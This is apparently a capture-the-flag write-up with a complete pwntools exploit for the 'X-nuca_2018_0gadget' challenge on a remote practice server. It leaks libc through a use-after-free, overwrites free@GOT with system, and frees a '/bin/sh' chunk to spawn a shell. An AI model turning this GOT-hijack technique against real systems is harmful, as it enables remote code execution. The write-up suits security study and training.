思路
在bss段上构造UAF，然后劫持GOT表即可。
exp:
#!/usr/bin/python2
from pwn import *
def pwn():
    """Drive the challenge binary's menu over the network.

    The steps mirror the write-up above: a stale-pointer (UAF) read of a GOT
    slot leaks a libc address, then free@GOT is rewritten. The comments below
    only restate what each visible line does; chunk indices follow the
    program's own slot bookkeeping, which is not visible here.
    """
    # Local run is commented out; the remote target is the CTF platform named
    # on the page.
    #p=process('./X-nuca_2018_0gadget')
    p=remote('node3.buuoj.cn',27565)
    # Symbols (GOT slots, libc offsets) come from the shipped binary and the
    # libc pwntools resolves for it; the offsets below are only valid for that
    # exact binary/libc pair.
    elf=ELF('./X-nuca_2018_0gadget')
    libc=elf.libc
    # Every menu prompt ends in ': ', so both helpers synchronise on it.
    # sda sends raw bytes (no newline) -- used for chunk contents, which may
    # contain binary data; sla appends a newline -- used for numbers/strings.
    sda=lambda data,data1:p.sendafter('%s'%(data),data1)
    sla=lambda data,data1:p.sendlineafter('%s'%(data),data1)
    # Menu option 1: size, title, raw data, then a mask field.
    def add(size,title,data,mask):
        sla(': ','1')
        sla(': ',str(size))
        sla(': ',title)
        sda(': ',data)
        sla(': ',mask)
    # Menu option 2: free the chunk at idx.
    def delete(idx,mask):
        sla(': ','2')
        sla(': ',str(idx))
        sla(': ',mask)
    # Menu option 3: print the chunk at idx.
    def show(idx,mask):
        sla(': ','3')
        sla(': ',str(idx))
        sla(': ',mask)
    # Heap grooming: three allocations followed by two frees. The exact sizes
    # and title lengths are tuned to this binary's layout and cannot be
    # derived from the script alone.
    add(0x90,'a'*0x9,'doudou1','xixixi')
    add(0x98,'b'*8,'dd','hahaha')
    add(0x68,'c'*0x90,'cc','binbin')
    delete(1,'lll')
    delete(2,'ccc')
    # 0x602178 is a fixed address in the binary (presumably in .bss, matching
    # the write-up, and implying a non-PIE build -- confirm with the section
    # table).
    add(0x98,'doudou',p64(0x602178),'123123')
    add(0x98,'doudou1','dd','kkkk')
    # The address of the free@GOT slot is written as chunk data.
    add(0x98,'aaa',p64(elf.got['free']),'jjjjj')
    # Leak: show() on index 0 prints memory that now aliases the GOT slot; the
    # first 6 bytes ending in 0x7f are taken as free's runtime address, and
    # subtracting free's libc offset gives the libc base.
    show(0,'123')
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
    system=libcbase+libc.sym['system']
    # Second round of grooming; the chunk filled with '/bin/sh\x00' is the
    # argument that free() will later receive.
    add(0xe8,'d','tttt','mmmm')
    add(0x38,'f','ffff','nnnn')
    add(0x48,'v'*0x90,'vvvv','vvvv')
    add(0x48,'b','/bin/sh\x00','bbbb')
    delete(5,'555')
    delete(6,'666')
    # free@GOT is overwritten with system's address. This only works because
    # .got.plt is writable at runtime: building with Full RELRO
    # (-z relro -z now) makes it read-only after loading and removes this
    # target; the UAF itself is the underlying bug.
    add(0x38,'1',p64(elf.got['free']),'555')
    add(0x38,'2','doudou','3333')
    add(0x38,'3',p64(system),'2222')
    log.success('libcbase: '+hex(libcbase))
    # delete(7) calls free() on what is presumably the '/bin/sh' chunk --
    # confirm the index against the program's slot assignment.
    delete(7,'111')
    p.interactive()
if __name__=="__main__":
    # Only open the remote connection when run as a script, not on import.
    pwn()